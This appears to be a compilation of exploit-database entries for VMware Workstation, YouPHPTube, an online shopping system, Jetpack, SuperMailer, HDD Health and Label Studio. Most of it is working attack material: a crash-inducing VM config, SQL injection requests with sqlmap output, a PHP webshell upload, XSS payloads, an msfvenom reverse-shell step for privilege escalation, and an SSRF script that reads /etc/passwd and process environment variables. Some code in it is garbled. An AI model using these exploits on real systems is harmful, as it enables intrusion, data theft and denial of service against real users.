#Title: VMware Workstation 15 Pro - Denial of Service
#Author: Milad Karimi
#Date: 2022-10-17
#Tested on: Windows 10 Pro and Windows 7 Pro (SP1) with VMware® Workstation 15 Pro (15.5.6 build-16341506)
#Affected: VMware Workstation Pro/Player 15.x
config.version = "8"
virtualHW.version = "4"
displayName = "credit's to Ex3ptionaL for find this vouln"
annotation = "Live CD ISO http://www.irongeek.com"
guestinfo.vmware.product.long = "credit's to Ex3ptionaL for find this vouln"
guestinfo.vmware.product.url = "http://www.millw0rm.com"
guestinfo.vmware.product.short = "LCDI"
guestinfo.vmware.product.version.major = "1"
guestinfo.vmware.product.version.minor = "0"
guestinfo.vmware.product.version.revision = "0"
guestinfo.vmware.product.version.type = "release"
guestinfo.vmware.product.class = "virtual machine"
guestinfo.vmware.product.build = "1.0.0rc8-20051212"
uuid.action = "create"
guestOS = "winxppro"
#####
# Memory
#####
memsize = "20000000000000"
# memsize = "300000000000000000000000000000"
# memsize = "400000000000000000000"
# memsize = "700000000000000000000000000000000000"
#
# Alternative larger memory allocations
#####
# USB
#####
usb.present = "TRUE"
#####
# Floppy
#####
floppy0.present = "FALSE"
#####
# IDE Storage
#####
ide1:0.present = "TRUE"
#Edit line below to change ISO to boot from
ide1:0.fileName = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.iso"
ide1:0.deviceType = "cdrom-image"
ide1:0.startConnected = "TRUE"
ide1:0.autodetect = "TRUE"
#####
# Network
#####
ethernet0.present = "TRUE"
ethernet0.connectionType = "nat"
# ethernet0.connectionType = "bridged"
#
# Switch these two to enable "Bridged" vs. "NAT"
#####
# Sound
#####
sound.present = "TRUE"
sound.virtualDev = "es1371"
sound.autoDetect = "TRUE"
sound.fileName = "-1"
#####
# Misc.
#
# (normal) high
priority.grabbed = "high"
tools.syncTime = "TRUE"
workingDir = "."
#
# (16) 32 64
sched.mem.pShare.checkRate = "32"
#
# (32) 64 128
sched.mem.pshare.scanRate = "64"
#
# Higher resolution lockout, adjust values to exceed 800x600
svga.maxWidth = "8000000000000000000"
svga.maxHeight = "6000000000000000000"
#
# (F) T
isolation.tools.dnd.disable = "FALSE"
#
# (F) T
isolation.tools.hgfs.disable = "FALSE"
#
# (F) T
isolation.tools.copy.disable = "FALSE"
#
# (F) T
isolation.tools.paste.disable = "FALSE"
#
# (T) F
logging = "TRUE"
#
#
# (F) T
log.append = "FALSE"
#
# (3) number of older files kept
log.keepOld = "1"
#
# (0) microseconds
keyboard.typematicMinDelay = 100000000000000000
uuid.location = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a"
uuid.bios = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a"
ethernet0.addressType = "generated"
ethernet0.generatedAddress = "00:0c:29:3c:d4:4a"
ethernet0.generatedAddressOffset = "0"
checkpoint.vmState = "live-cd-iso.vmss"
tools.remindInstall = "TRUE"
Exploit code:
buffer = "A" * 118000000000000000
payload = buffer
try:
f=open("PoC.vmx","w")
print "[+] Creating %s evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: YouPHPTube <= 7.8 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-01-31
# Vendor Homepage: https://www.youphptube.com/
# Software Link : https://www.youphptube.com/
# Tested Version: 7.8
# Tested on: Windows 7, 10 using XAMPP
# Vulnerability Type: LFI + Path Traversal
CVSS v3: 7.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE: CWE-829, CWE-22
Vulnerability description: YouPHPTube v7.8 allows unauthenticated directory
traversal and Local File Inclusion through the lang parameter in a
/?lang=PATH+TRAVERSAL+FILE (without .php) GET request, because of an
include_once in the locale/function.php page.
Proof of concept:
To detect: http://localhost/youphptube/index.php?lang=)
An error is generated:
Warning: preg_grep(): Compilation failed: unmatched parentheses at offset 0
in C:\xampp\htdocs\YouPHPTube\locale\function.php on line 47
In function.php page, we can see:
// filter some security here
// NOTE(review): the two filters below remove quote characters and HTML tags
// from $_GET['lang'], but neither touches "/" or "..", so a traversal
// sequence passes through unchanged.
if (!empty($_GET['lang'])) {
    $_GET['lang'] = str_replace(array("'", '"', """, "'"),
        array('', '', '', ''), xss_esc($_GET['lang']));
}
if (empty($_SESSION['language'])) {
    $_SESSION['language'] = $config->getLanguage();
}
if (!empty($_GET['lang'])) {
    $_GET['lang'] = strip_tags($_GET['lang']);
    // NOTE(review): the request-supplied value is persisted in the session and
    // becomes a path component of the include below. A fix would accept only
    // values from an explicit list of shipped locales (or at least apply
    // basename()) before storing it.
    $_SESSION['language'] = $_GET['lang'];
}
// NOTE(review): "@" suppresses the include warning, so a failed or unexpected
// include may also be absent from the PHP error log.
@include_once
    "{$global['systemRootPath']}locale/{$_SESSION['language']}.php";
The parameter "lang" can be modified and load a php file in the server.
In Document root: /phpinfo.php with this content:
<?php echo phpinfo(); ?>
To Get phpinfo.php: http://127.0.0.1/youphptube/?lang=../../phpinfo
Note: phpinfo without ".php".
The new Path is:
@include_once "{$global['systemRootPath']}locale/../../phpinfo.php";
And you can see the PHP information into the browser.
# Vulnerability Type: reflected Cross-Site Scripting (XSS)
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: YouPHPTube 7.8 and before does not sufficiently
encode user-controlled input, resulting in a reflected Cross-Site
Scripting (XSS) vulnerability via
/<YouPHPTube_path_directory>/signup?redirectUri=<XSS>, in the redirectUri
parameter.
Proof of concept:
http://localhost/
<YouPHPTube_path_directory>/signup?redirectUri='"()%26%25<ScRipt>alert(1)</ScRipt>
# Exploit Title: Online shopping system advanced 1.0 - Multiple
Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2020-09-24
# Vendor Homepage:
https://github.com/PuneethReddyHC/online-shopping-system-advanced
# Software Link :
https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/master.zip
# Tested Version: 1.0
# Tested on: Windows 10 using XAMPP / Linux Ubuntu server 18.04 + Apache +
php 5.X/7.X + MySQL
# Recap: SQLi = 2, RCE = 1, stored XSS = 2, reflected XSS = 2: 7
vulnerabilities
# Vulnerability Type: SQL Injection - #1
CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-89
Vulnerability description: Online shopping system advanced 1.0 allows SQL
injection via the admin/edit_user.php, user_id parameter.
Proof of concept:
Save this content in a file:
POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------120411781422335
Content-Length: 489
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1
-----------------------------120411781422335
Content-Disposition: form-data; name="user_id"
25
-----------------------------120411781422335
Content-Disposition: form-data; name="email"
otheruser@gmail.com
-----------------------------120411781422335
Content-Disposition: form-data; name="password"
puneeth@123
-----------------------------120411781422335
Content-Disposition: form-data; name="btn_save"
-----------------------------120411781422335--
And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p user_id
(custom) POST parameter 'MULTIPART user_id' is vulnerable. Do you want to
keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 115
HTTP(s) requests:
---
Parameter: MULTIPART user_id ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: -----------------------------120411781422335
Content-Disposition: form-data; name="user_id"
25' AND SLEEP(5) AND 'HGWF'='HGWF
-----------------------------120411781422335
Content-Disposition: form-data; name="email"
otheruser@gmail.com
-----------------------------120411781422335
Content-Disposition: form-data; name="password"
puneeth@123
-----------------------------120411781422335
Content-Disposition: form-data; name="btn_save"
-----------------------------120411781422335--
---
[16:25:28] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.38, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
# Vulnerability Type: SQL Injection - #2
CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-89
Vulnerability description: Online shopping system advanced 1.0 allows SQL
injection via the action.php, proId parameter.
Proof of concept:
Save this content in a file:
POST http://127.0.0.1/online/action.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Host: 127.0.0.1
addToCart=1&proId=70
And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p proId
POST parameter 'proId' is vulnerable. Do you want to keep testing the
others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 72
HTTP(s) requests:
---
Parameter: proId (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: addToCart=1&proId=70' AND 7704=7704 AND 'IGsd'='IGsd
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: addToCart=1&proId=70' AND SLEEP(5) AND 'pAwv'='pAwv
---
[16:03:38] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.38, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
# Vulnerability Type: Remote Command Execution (RCE)
CVSS v3: 9.8
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-434
Vulnerability description: File Restriction Bypass vulnerabilities were
found in Online shopping system advanced v1.0. This allows an
authenticated user to potentially obtain RCE via a webshell.
Proof of concept:
1. Go the add product >> (admin/add_product.php)
2.- Select product image and load a valid image.
3. Turn Burp/ZAP Intercept On
4. Select webshell - ex: shell.php
5. Alter the request in the upload...
Update 'filename' to the desired extension, e.g. shell.php.
It is not necessary to change the content type to 'image/png'.
Example exploitation request:
====================================================================================================
POST http://127.0.0.1/online/admin/add_product.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------184982084830387
Content-Length: 960
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/add_product.php
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1
-----------------------------184982084830387
Content-Disposition: form-data; name="product_name"
demo2
-----------------------------184982084830387
Content-Disposition: form-data; name="details"
demo2
-----------------------------184982084830387
Content-Disposition: form-data; name="picture"; filename="shell.php"
Content-Type: image/gif
<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?>
-----------------------------184982084830387
Content-Disposition: form-data; name="price"
1
-----------------------------184982084830387
Content-Disposition: form-data; name="product_type"
1
-----------------------------184982084830387
Content-Disposition: form-data; name="brand"
1
-----------------------------184982084830387
Content-Disposition: form-data; name="tags"
Summet
-----------------------------184982084830387
Content-Disposition: form-data; name="submit"
-----------------------------184982084830387--
====================================================================================================
6. To view the webshell path go to Product List (admin/cosmetics_list.php)
7. Send the request and visit your new webshell
Ex:
http://127.0.0.1/online/product_images/1600959116_shell.php?cmd=whoami
nt authority\system
# Vulnerability Type: stored Cross-Site Scripting (XSS) - #1
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Online shopping system advanced v1.0 does not
sufficiently encode user-controlled input, resulting in a stored
Cross-Site Scripting (XSS) vulnerability via admin/edit_user.php, in
multiple parameters.
Proof of concept:
Stored:
POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------120411781422335
Content-Length: 496
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1
-----------------------------120411781422335
Content-Disposition: form-data; name="user_id"
25
-----------------------------120411781422335
Content-Disposition: form-data; name="email"
otheruser@gmail.com
-----------------------------120411781422335
Content-Disposition: form-data; name="password"
</td><script>alert(1);</script><td>
-----------------------------120411781422335
Content-Disposition: form-data; name="btn_save"
-----------------------------120411781422335--
# Vulnerability Type: stored Cross-Site Scripting (XSS) - #2
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Online shopping system advanced v1.0 does not
sufficiently encode user-controlled input, resulting in a stored
Cross-Site Scripting (XSS) vulnerability via admin/add_user.php, in
multiple parameters.
Proof of concept:
Stored:
POST http://127.0.0.1/online/admin/add_user.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 192
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/add_user.php
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1
first_name=demo&last_name=demo&email=demo%40localhost.inet&user_password=demo&mobile=5555555555&address1=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctd%3E&address2=here+5&btn_save=
# Vulnerability Type: reflected Cross-Site Scripting (XSS) - #1
CVSS v3: 6.1
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Online shopping system advanced v1.0, does not
sufficiently encode user-controlled inputs, resulting in a reflected
Cross-Site Scripting (XSS) vulnerability via the admin/clothes_list.php, in
page parameter.
Proof of concept:
Reflected:
http://127.0.0.1/online/admin/clothes_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E
# Vulnerability Type: reflected Cross-Site Scripting (XSS) - #2
CVSS v3: 6.1
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Online shopping system advanced v1.0, does not
sufficiently encode user-controlled inputs, resulting in a reflected
Cross-Site Scripting (XSS) vulnerability via the admin/cosmetics_list.php,
in page parameter.
Proof of concept:
Reflected:
http://127.0.0.1/online/admin/cosmetics_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E
# Exploit Title: Jetpack 11.4 - Cross Site Scripting (XSS)
# Date: 2022-10-19
# Author: Behrouz Mansoori
# Software Link: https://wordpress.org/plugins/jetpack
# Version: 11.4
# Tested on: Mac m1
# CVE: N/A
1. Description:
This plugin creates a Jetpack from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
2. Proof of Concept:
http://localhost/modules/contact-form/grunion-form-view.php?post_id=<script>alert(document.cookie)</script>
# Exploit Title: SuperMailer v11.20 - Buffer overflow DoS
# Exploit Author: Rafael Pedrero
# Discovery Date: 2021-02-07
# Vendor Homepage:
https://int.supermailer.de/download_newsletter_software.htm
# Software Link : https://int.supermailer.de/smintsw.zip /
https://int.supermailer.de/smintsw_x64.zip
# Tested Version: v11.20 32bit/64bit [11.20.0.2204]
# Tested on: Windows 7, 10
CVSS v3: 3.3
CVSS vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
CWE: CWE-20
Vulnerability description: A vulnerability in Newsletter Software
SuperMailer v11.20 32bit/64bit [11.20.0.2204] could allow an attacker to
cause a process crash, resulting in a Denial of Service (DoS) condition for
the application on an affected system. The vulnerability exists due to
insufficient validation of certain elements of a malformed configuration
file. An attacker could exploit this vulnerability by sending a user a
malicious SMB (configuration) file through a link or email attachment
and persuading the user to open the file with the affected software on the
local system. A successful exploit could allow the attacker to cause the
application to crash when trying to load the malicious file.
Proof of concept:
1.- Go to File -> Save program options...
2.- Save the file (default extension *.smb)
3.- Edit the file and insert a long run of 'A' characters somewhere. Example: DoS.smb
file
Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
00000000 10 03 00 00 00 00 00 00 A9 E5 7E 41 41 41 41 41 ........©å~AAAAA
00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000030 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000050 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000060 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000070 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000080 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000090 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000B0 41 41 97 99 E5 40 00 00 00 00 00 00 00 00 00 00 AA—™å@..........
000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000E0 00 00 00 00 00 00 6B 00 00 00 53 00 6F 00 66 00 ......k...S.o.f.
000000F0 74 00 77 00 61 00 72 00 65 00 5C 00 4D 00 69 00 t.w.a.r.e.\.M.i.
00000100 72 00 6B 00 6F 00 20 00 42 00 6F 00 65 00 65 00 r.k.o. .B.o.e.e.
00000110 72 00 20 00 53 00 6F 00 66 00 74 00 77 00 61 00 r. .S.o.f.t.w.a.
00000120 72 00 65 00 5C 00 53 00 75 00 70 00 65 00 72 00 r.e.\.S.u.p.e.r.
00000130 4D 00 61 00 69 00 6C 00 65 00 72 00 5C 00 54 00 M.a.i.l.e.r.\.T.
00000140 65 00 73 00 74 00 20 00 45 00 4D 00 61 00 69 00 e.s.t. .E.M.a.i.
00000150 6C 00 20 00 41 00 64 00 64 00 72 00 65 00 73 00 l. .A.d.d.r.e.s.
00000160 73 00 65 00 73 00 00 00 00 00 00 00 00 00 00 00 s.e.s...........
And save the file.
4.- Go to File -> Restore program options...
5.- The application "sm.exe" crash.
# Exploit Title: HDD Health 4.2.0.112 - 'HDDHealth' Unquoted Service Path
# Exploit Author: Jorge Manuel Lozano Gómez
# Date: 2022-10-19
# Vendor Homepage: https://www.panterasoft.com
# Software Link: https://hdd-health.softonic.com
# Version : 4.2.0.112
# Tested on: Windows 11 64bit
# CVE : N/A
About Unquoted Service Path :
==============================
When a service is created whose executable path contains spaces and is not enclosed within quotes, this leads to a vulnerability known as Unquoted Service Path, which allows a user to gain SYSTEM privileges
(only if the vulnerable service is running with SYSTEM privilege level, which most of the time it is).
Description:
==============================
HDD Health installs a service with an unquoted service path.
To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run with elevated privileges.
# PoC
===========
1. Open CMD and check for the vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ]
2. The vulnerable service would show up.
3. Check the service permissions by typing [ sc qc "HDDHealth" ]
4. The command would return..
C:\>sc qc "HDDHealth"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: HDDHealth
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\HDD Health\HDDHealthService.exe
LOAD_ORDER_GROUP :
TAG : 0
ISPLAY_NAME : HDDHealth
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
5. This concludes that the service is running as SYSTEM.
6. Now create a payload with msfvenom or other tools and name it to HDDHealthService.exe.
7. Make sure you have write permissions to "C:\Program Files (x86)\HDD Health" directory.
8. Provided that you have right permissions, drop the HDDHealthService.exe executable you created into the "C:\Program Files (x86)\HDD Health" directory.
9. Start a listener.
9. Now restart the HDDHealth service by giving the command [ sc stop HDDHealth ] followed by [ sc start HDDHealth ]
9.1 If you cannot stop and start the service, since the service is of type "AUTO_START" we can restart the system by executing [ shutdown /r /t 0 ] and get the shell when the service starts automatically.
10. Got shell.
During my testing :
Payload : msfvenom -p windows/shell_reverse_tcp -f exe -o HDDHealthService.exe
# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
# Exploit Title: Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)
# Google Dork: intitle:"Label Studio" intext:"Sign Up" intext:"Welcome to Label Studio Community Edition"
# Date: 2022-10-03
# Exploit Author: @DeveloperNinja, IncisiveSec@protonmail.com
# Vendor Homepage: https://github.com/heartexlabs/label-studio, https://labelstud.io/
# Software Link: https://github.com/heartexlabs/label-studio/releases
# Version: <=1.5.0
# CVE : CVE-2022-36551
# Docker Container: heartexlabs/label-studio
# Server Side Request Forgery (SSRF) in the Data Import module in Heartex - Label Studio Community Edition
# versions 1.5.0 and earlier allows an authenticated user to access arbitrary files on the system.
# Furthermore, self-registration is enabled by default in these versions of Label Studio enabling a remote
# attacker to create a new account and then exploit the SSRF.
#
# This exploit has been tested on Label Studio 1.5.0
#
# Exploit Usage Examples (replace with your target details):
# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /etc/passwd
# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /proc/self/environ
# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /label-studio/data/label_studio.sqlite3 --out label_studio.sqlite3.sqlite3
import json
import argparse
import requests
import shutil
from urllib.parse import urljoin
from urllib.parse import urlparse
# Silence urllib3's warnings, notably the one emitted for every verify=False
# request below (TLS certificate checking is turned off throughout this script).
requests.packages.urllib3.disable_warnings()
# main function for exploit
def main(url, filePath, writePath, username, password, shouldRegister):
    """Drive the whole flow: reachability check, login, project, fetch, cleanup.

    Args:
        url: Base URL of the Label Studio instance.
        filePath: Path (or URL) handed to the project import endpoint.
        writePath: Local path to write the fetched data to, or None to print it.
        username: Account e-mail.
        password: Account password.
        shouldRegister: Whether login() may self-register the account if it
            does not exist yet.

    Calls exit(1) when the URL does not answer with HTTP 200.
    """
    unreachable_msg = "[!] Error: URL is not reachable, check the URL and try again"
    try:
        # verify=False: the TLS certificate is not validated
        probe = requests.get(url, verify=False)
    except requests.exceptions.RequestException:
        print(unreachable_msg)
        exit(1)
    if probe.status_code != 200:
        print(unreachable_msg)
        exit(1)
    print("[+] URL is reachable")

    session = requests.Session()
    login(session, url, username, password, shouldRegister)
    print("[+] Logged in")

    print("[+] Creating project...")
    project = create_project(session, url)
    project_id = project["id"]
    print("[+] Project created, ID: {}".format(project_id))

    print("[+] Attempting to fetch: {}".format(filePath))
    fetch_file(session, url, project_id, filePath, writePath)

    print("[+] Deleting Project.. {}".format(project_id))
    delete_project(session, url, project_id)
    print("[+] Project Deleted")
    print("[*] Finished executing exploit")
# login, logs the user in
def login(session, url, username, password, shouldRegister):
    """Authenticate `session` against `url`, optionally self-registering.

    Args:
        session: requests.Session that carries the auth cookies afterwards.
        url: Base URL of the Label Studio instance.
        username: Account e-mail.
        password: Account password.
        shouldRegister: If True and the login page reports unknown
            credentials, POST to /user/signup/ to create the account.

    Returns None on success; calls exit(1) when the login fails and
    registration was not requested.
    """
    # hit the main page first to get the CSRF token set
    r = session.get(url, verify=False)
    r = session.post(
        urljoin(url, "/user/login"),
        data={
            "email": username,
            "password": password,
            # the csrftoken cookie set by the GET above is echoed back as a form field
            "csrfmiddlewaretoken": session.cookies["csrftoken"],
        },
        verify=False
    )
    # success is inferred from the absence of the form's error text, not from a redirect
    if r.status_code == 200 and r.text.find("The email and password you entered") < 0:
        return
    elif r.text.find("The email and password you entered") > 0 and shouldRegister:
        print("[!] Account does not exist, registering...")
        # NOTE(review): unlike every other request here, this POST omits verify=False
        r = session.post(
            urljoin(url, "/user/signup/"),
            data={
                "email": username,
                "password": password,
                "csrfmiddlewaretoken": session.cookies["csrftoken"],
                'allow_newsletters': False,
            },
        )
        if r.status_code == 302:
            # at this point the system automatically logs you in (assuming self-registration is enabled, which it is by default)
            # NOTE(review): disabling self-registration removes this path; with it
            # enabled, anyone who can reach the instance can obtain an account.
            return
        # NOTE(review): a non-302 signup response falls through here and returns
        # None silently, so the caller proceeds as if logged in.
    else:
        print("[!] Error: Could not login, check the credentials and try again")
        exit(1)
# create_project creates a temporary project for exploiting the SSRF
def create_project(session, url):
    """POST /api/projects and return the decoded JSON of the new project.

    Args:
        session: authenticated requests.Session.
        url: Base URL of the instance.

    Returns the parsed response body on HTTP 200/201; calls exit(1) otherwise.
    """
    response = session.post(
        urljoin(url, "/api/projects"),
        data={"title": "TPS Report Finder"},
        verify=False,
    )
    if response.status_code not in (200, 201):
        print("[!] Error: Could not create project, check your credentials / permissions")
        exit(1)
    return response.json()
def fetch_file(session, url, projectId, filePath, writePath):
    """Import `filePath` into project `projectId` and print or save the result.

    Args:
        session: authenticated requests.Session.
        url: Base URL of the instance; rebound below to the import endpoint.
        projectId: id returned by create_project().
        filePath: Local path or URL; a bare path is prefixed with "file://".
        writePath: Destination file for the fetched bytes, or None to print
            the response body to stdout.

    Returns None in every case; failures are printed, not raised.
    """
    # if scheme is empty prepend file://
    parsedFilePath = urlparse(filePath)
    if parsedFilePath.scheme == "":
        filePath = "file://" + filePath
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    # `url` now points at the import endpoint; the later urljoin() calls pass
    # absolute paths, so they still resolve against the same host.
    url = urljoin(url, "/api/projects/{}/import".format(projectId))
    r = session.post(url,
        data={
            "url": filePath, # This is the main vulnerability, there is no restriction on the "schema" of the provided URL
        },
        headers=headers,
        verify=False
    )
    # NOTE(review): the server-side fix is an allow-list of schemes (http/https
    # only) for the "url" import field, together with rejecting destinations
    # that resolve to loopback or internal addresses.
    if r.status_code == 201:
        # file found! -- first grab the file path details
        # NOTE(review): a 201 with an empty "file_upload_ids" list raises IndexError here
        fileId = r.json()["file_upload_ids"][0]
        r = session.get(urljoin(url, "/api/import/file-upload/{}".format(fileId)), headers=headers, verify=False)
        # stream=True so the body can be copied from r.raw below without being read into memory first
        r = session.get(urljoin(url, "/data/{}".format(r.json()["file"])), headers=headers, verify=False, stream=True)
        print("[+] File found!")
        # if user wants to write to disk, make it so
        if writePath != None:  # NOTE(review): `is not None` is the idiomatic comparison
            print("[+] Writing to {}".format(writePath))
            # write the file to disk
            with open(writePath, 'wb') as handle:
                shutil.copyfileobj(r.raw, handle)
                handle.close()  # redundant: the with-block already closes the file
            return
        else:
            print("==========================================================")
            print(r.text)
            print("==========================================================")
            return
    else:
        print("[!] Error: Could not fetch file, it's likely the file path doesn't exist: ")
        # NOTE(review): assumes the error body is JSON with
        # validation_errors.non_field_errors; a non-JSON error page (e.g. an
        # HTML 403) would raise here instead — TODO confirm
        print("\t" + r.json()["validation_errors"]["non_field_errors"][0])
        return
def delete_project(session, url, projectId):
    """DELETE /api/projects/<projectId>; calls exit(1) unless the API answers 200/204.

    Args:
        session: authenticated requests.Session.
        url: Base URL of the instance.
        projectId: id of the project to remove.
    """
    endpoint = urljoin(url, "/api/projects/{}".format(projectId))
    response = session.delete(endpoint, verify=False)
    if response.status_code in (200, 204):
        return
    print("[!] Error: Could not delete project, check your credentials / permissions")
    exit(1)
# Command-line entry point: collect the options and hand them to main().
